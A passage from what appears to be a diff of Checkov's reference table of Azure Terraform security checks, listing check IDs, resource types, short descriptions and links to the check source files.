Defender is set to On for SQL servers on machines | Terraform | [AzureDefenderOnSqlServerVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py) | +| 1329 | CKV_AZURE_80 | resource | azurerm_app_service | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | +| 1330 | CKV_AZURE_80 | resource | azurerm_windows_web_app | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | +| 1331 | CKV_AZURE_81 | resource | azurerm_app_service | Ensure that 'PHP version' is the latest, if used to run the web app | Terraform | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py) | +| 1332 | CKV_AZURE_82 | resource | azurerm_app_service | Ensure that 'Python version' is the latest, if used to run the web app | Terraform | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py) | +| 1333 | CKV_AZURE_83 | resource | azurerm_app_service | Ensure that 'Java version' is the latest, if used to run the web app | Terraform | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py) | +| 1334 | CKV_AZURE_84 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Storage | Terraform | 
[AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py) | +| 1335 | CKV_AZURE_85 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Kubernetes | Terraform | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py) | +| 1336 | CKV_AZURE_86 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Container Registries | Terraform | [AzureDefenderOnContainerRegistry.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py) | +| 1337 | CKV_AZURE_87 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Key Vault | Terraform | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py) | +| 1338 | CKV_AZURE_88 | resource | azurerm_app_service | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | +| 1339 | CKV_AZURE_88 | resource | azurerm_linux_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | +| 1340 | CKV_AZURE_88 | resource | azurerm_windows_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | +| 1341 | CKV_AZURE_89 | resource | azurerm_redis_cache | Ensure that Azure Cache for Redis disables public network 
access | Terraform | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py) | +| 1342 | CKV_AZURE_91 | resource | azurerm_redis_cache | Ensure that only SSL are enabled for Cache for Redis | Terraform | [RedisCacheEnableNonSSLPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py) | +| 1343 | CKV_AZURE_92 | resource | azurerm_linux_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | +| 1344 | CKV_AZURE_92 | resource | azurerm_windows_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | +| 1345 | CKV_AZURE_93 | resource | azurerm_managed_disk | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Terraform | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py) | +| 1346 | CKV_AZURE_94 | resource | azurerm_mysql_flexible_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | +| 1347 | CKV_AZURE_94 | resource | azurerm_mysql_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | +| 1348 | CKV_AZURE_95 | resource | azurerm_virtual_machine_scale_set | Ensure that automatic OS 
image patching is enabled for Virtual Machine Scale Sets | Terraform | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py) | +| 1349 | CKV_AZURE_96 | resource | azurerm_mysql_server | Ensure that MySQL server enables infrastructure encryption | Terraform | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLEncryptionEnabled.py) | +| 1350 | CKV_AZURE_97 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) | +| 1351 | CKV_AZURE_97 | resource | azurerm_windows_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) | +| 1352 | CKV_AZURE_98 | resource | azurerm_container_group | Ensure that Azure Container group is deployed into virtual network | Terraform | [AzureContainerGroupDeployedIntoVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py) | +| 1353 | CKV_AZURE_99 | resource | azurerm_cosmosdb_account | Ensure Cosmos DB accounts have restricted access | Terraform | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py) | +| 1354 | CKV_AZURE_100 | resource | azurerm_cosmosdb_account | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Terraform | 
[CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py) | +| 1355 | CKV_AZURE_101 | resource | azurerm_cosmosdb_account | Ensure that Azure Cosmos DB disables public network access | Terraform | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py) | +| 1356 | CKV_AZURE_102 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables geo-redundant backups | Terraform | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py) | +| 1357 | CKV_AZURE_103 | resource | azurerm_data_factory | Ensure that Azure Data Factory uses Git repository for source control | Terraform | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py) | +| 1358 | CKV_AZURE_104 | resource | azurerm_data_factory | Ensure that Azure Data factory public network access is disabled | Terraform | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py) | +| 1359 | CKV_AZURE_105 | resource | azurerm_data_lake_store | Ensure that Data Lake Store accounts enables encryption | Terraform | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py) | +| 1360 | CKV_AZURE_106 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain public network access is disabled | Terraform | [EventgridDomainNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py) | +| 1361 | CKV_AZURE_107 | resource | azurerm_api_management | Ensure 
that API management services use virtual networks | Terraform | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py) | +| 1362 | CKV_AZURE_108 | resource | azurerm_iothub | Ensure that Azure IoT Hub disables public network access | Terraform | [IoTNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py) | +| 1363 | CKV_AZURE_109 | resource | azurerm_key_vault | Ensure that key vault allows firewall rules settings | Terraform | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py) | +| 1364 | CKV_AZURE_110 | resource | azurerm_key_vault | Ensure that key vault enables purge protection | Terraform | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py) | +| 1365 | CKV_AZURE_111 | resource | azurerm_key_vault | Ensure that key vault enables soft delete | Terraform | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py) | +| 1366 | CKV_AZURE_112 | resource | azurerm_key_vault_key | Ensure that key vault key is backed by HSM | Terraform | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py) | +| 1367 | CKV_AZURE_113 | resource | azurerm_mssql_server | Ensure that SQL server disables public network access | Terraform | [SQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py) | +| 1368 | CKV_AZURE_114 | resource | azurerm_key_vault_secret | Ensure that key vault secrets have "content_type" 
set | Terraform | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretContentType.py) | +| 1369 | CKV_AZURE_115 | resource | azurerm_kubernetes_cluster | Ensure that AKS enables private clusters | Terraform | [AKSEnablesPrivateClusters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py) | +| 1370 | CKV_AZURE_116 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses Azure Policies Add-on | Terraform | [AKSUsesAzurePoliciesAddon.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py) | +| 1371 | CKV_AZURE_117 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses disk encryption set | Terraform | [AKSUsesDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py) | +| 1372 | CKV_AZURE_118 | resource | azurerm_network_interface | Ensure that Network Interfaces disable IP forwarding | Terraform | [NetworkInterfaceEnableIPForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py) | +| 1373 | CKV_AZURE_119 | resource | azurerm_network_interface | Ensure that Network Interfaces don't use public IPs | Terraform | [AzureNetworkInterfacePublicIPAddressId.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureNetworkInterfacePublicIPAddressId.yaml) | +| 1374 | CKV_AZURE_120 | resource | azurerm_application_gateway | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) | +| 1375 | CKV_AZURE_120 | resource | azurerm_web_application_firewall_policy | Ensure that Application 
Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) | +| 1376 | CKV_AZURE_121 | resource | azurerm_frontdoor | Ensure that Azure Front Door enables WAF | Terraform | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py) | +| 1377 | CKV_AZURE_122 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway uses WAF in "Detection" or "Prevention" modes | Terraform | [AppGWUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py) | +| 1378 | CKV_AZURE_123 | resource | azurerm_frontdoor_firewall_policy | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Terraform | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py) | +| 1379 | CKV_AZURE_124 | resource | azurerm_search_service | Ensure that Azure Cognitive Search disables public network access | Terraform | [AzureSearchPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py) | +| 1380 | CKV_AZURE_125 | resource | azurerm_service_fabric_cluster | Ensures that Service Fabric use three levels of protection available | Terraform | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py) | +| 1381 | CKV_AZURE_126 | resource | azurerm_service_fabric_cluster | Ensures that Active Directory is used for authentication for Service Fabric | Terraform | 
[ActiveDirectoryUsedAuthenticationServiceFabric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py) | +| 1382 | CKV_AZURE_127 | resource | azurerm_mysql_server | Ensure that My SQL server enables Threat detection policy | Terraform | [MySQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py) | +| 1383 | CKV_AZURE_128 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables Threat detection policy | Terraform | [PostgresSQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py) | +| 1384 | CKV_AZURE_129 | resource | azurerm_mariadb_server | Ensure that MariaDB server enables geo-redundant backups | Terraform | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py) | +| 1385 | CKV_AZURE_130 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables infrastructure encryption | Terraform | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py) | +| 1386 | CKV_AZURE_131 | resource | azurerm_security_center_contact | Ensure that 'Security contact emails' is set | Terraform | [SecurityCenterContactEmails.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py) | +| 1387 | CKV_AZURE_132 | resource | azurerm_cosmosdb_account | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Terraform | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py) | +| 1388 
| CKV_AZURE_133 | resource | azurerm_frontdoor_firewall_policy | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py) | +| 1389 | CKV_AZURE_134 | resource | azurerm_cognitive_account | Ensure that Cognitive Services accounts disable public network access | Terraform | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py) | +| 1390 | CKV_AZURE_135 | resource | azurerm_web_application_firewall_policy | Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py) | +| 1391 | CKV_AZURE_136 | resource | azurerm_postgresql_flexible_server | Ensure that PostgreSQL Flexible server enables geo-redundant backups | Terraform | [PostgreSQLFlexiServerGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py) | +| 1392 | CKV_AZURE_137 | resource | azurerm_container_registry | Ensure ACR admin account is disabled | Terraform | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAdminAccountDisabled.py) | +| 1393 | CKV_AZURE_138 | resource | azurerm_container_registry | Ensures that ACR disables anonymous pulling of images | Terraform | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py) | +| 1394 | CKV_AZURE_139 | resource | azurerm_container_registry | Ensure ACR set to disable public 
networking | Terraform | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py) | +| 1395 | CKV_AZURE_140 | resource | azurerm_cosmosdb_account | Ensure that Local Authentication is disabled on CosmosDB | Terraform | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py) | +| 1396 | CKV_AZURE_141 | resource | azurerm_kubernetes_cluster | Ensure AKS local admin account is disabled | Terraform | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py) | +| 1397 | CKV_AZURE_142 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Local Authentication is disabled | Terraform | [MLCCLADisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLCCLADisabled.py) | +| 1398 | CKV_AZURE_143 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster nodes do not have public IP addresses | Terraform | [AKSNodePublicIpDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNodePublicIpDisabled.py) | +| 1399 | CKV_AZURE_144 | resource | azurerm_machine_learning_workspace | Ensure that Public Access is disabled for Machine Learning Workspace | Terraform | [MLPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLPublicAccess.py) | +| 1400 | CKV_AZURE_145 | resource | azurerm_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1401 | CKV_AZURE_145 | resource | azurerm_function_app_slot | Ensure Function app is 
using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1402 | CKV_AZURE_145 | resource | azurerm_linux_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1403 | CKV_AZURE_145 | resource | azurerm_linux_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1404 | CKV_AZURE_145 | resource | azurerm_windows_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1405 | CKV_AZURE_145 | resource | azurerm_windows_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1406 | CKV_AZURE_146 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_retention' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogRetentionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogRetentionEnabled.py) | +| 1407 | CKV_AZURE_147 | resource | azurerm_postgresql_server | Ensure PostgreSQL is using the latest version of TLS encryption | Terraform | 
[PostgreSQLMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py) | +| 1408 | CKV_AZURE_148 | resource | azurerm_redis_cache | Ensure Redis Cache is using the latest version of TLS encryption | Terraform | [RedisCacheMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py) | +| 1409 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | +| 1410 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | +| 1411 | CKV_AZURE_150 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Minimum Nodes Set To 0 | Terraform | [MLComputeClusterMinNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py) | +| 1412 | CKV_AZURE_151 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables encryption | Terraform | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py) | +| 1413 | CKV_AZURE_152 | resource | azurerm_api_management | Ensure Client Certificates are enforced for API management | Terraform | [APIManagementCertsEnforced.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py) | +| 1414 | CKV_AZURE_153 | resource | 
azurerm_app_service_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | +| 1415 | CKV_AZURE_153 | resource | azurerm_linux_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | +| 1416 | CKV_AZURE_153 | resource | azurerm_windows_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | +| 1417 | CKV_AZURE_154 | resource | azurerm_app_service_slot | Ensure the App service slot is using the latest version of TLS encryption | Terraform | [AppServiceSlotMinTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py) | +| 1418 | CKV_AZURE_155 | resource | azurerm_app_service_slot | Ensure debugging is disabled for the App service slot | Terraform | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py) | +| 1419 | CKV_AZURE_156 | resource | azurerm_mssql_database_extended_auditing_policy | Ensure default Auditing policy for a SQL Server is configured to capture and retain the activity logs | Terraform | [MSSQLServerAuditPolicyLogMonitor.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py) | +| 1420 | CKV_AZURE_157 | resource | azurerm_synapse_workspace | Ensure that Synapse workspace has data_exfiltration_protection_enabled | Terraform | 
[SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py) | +| 1421 | CKV_AZURE_158 | resource | azurerm_databricks_workspace | Ensure Databricks Workspace data plane to control plane communication happens over private link | Terraform | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py) | +| 1422 | CKV_AZURE_159 | resource | azurerm_function_app | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | +| 1423 | CKV_AZURE_159 | resource | azurerm_function_app_slot | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | +| 1424 | CKV_AZURE_160 | resource | azurerm_network_security_group | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | +| 1425 | CKV_AZURE_160 | resource | azurerm_network_security_rule | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | +| 1426 | CKV_AZURE_161 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal is enabled on for HTTPS | Terraform | [SpringCloudAPIPortalHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py) | +| 1427 
| CKV_AZURE_162 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal Public Access Is Disabled | Terraform | [SpringCloudAPIPortalPublicAccessIsDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py) | +| 1428 | CKV_AZURE_163 | resource | azurerm_container_registry | Enable vulnerability scanning for container images. | Terraform | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRContainerScanEnabled.py) | +| 1429 | CKV_AZURE_164 | resource | azurerm_container_registry | Ensures that ACR uses signed/trusted images | Terraform | [ACRUseSignedImages.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRUseSignedImages.py) | +| 1430 | CKV_AZURE_165 | resource | azurerm_container_registry | Ensure geo-replicated container registries to match multi-region container deployments. | Terraform | [ACRGeoreplicated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRGeoreplicated.py) | +| 1431 | CKV_AZURE_166 | resource | azurerm_container_registry | Ensure container image quarantine, scan, and mark images verified | Terraform | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableImageQuarantine.py) | +| 1432 | CKV_AZURE_167 | resource | azurerm_container_registry | Ensure a retention policy is set to cleanup untagged manifests. | Terraform | [ACREnableRetentionPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableRetentionPolicy.py) | +| 1433 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. 
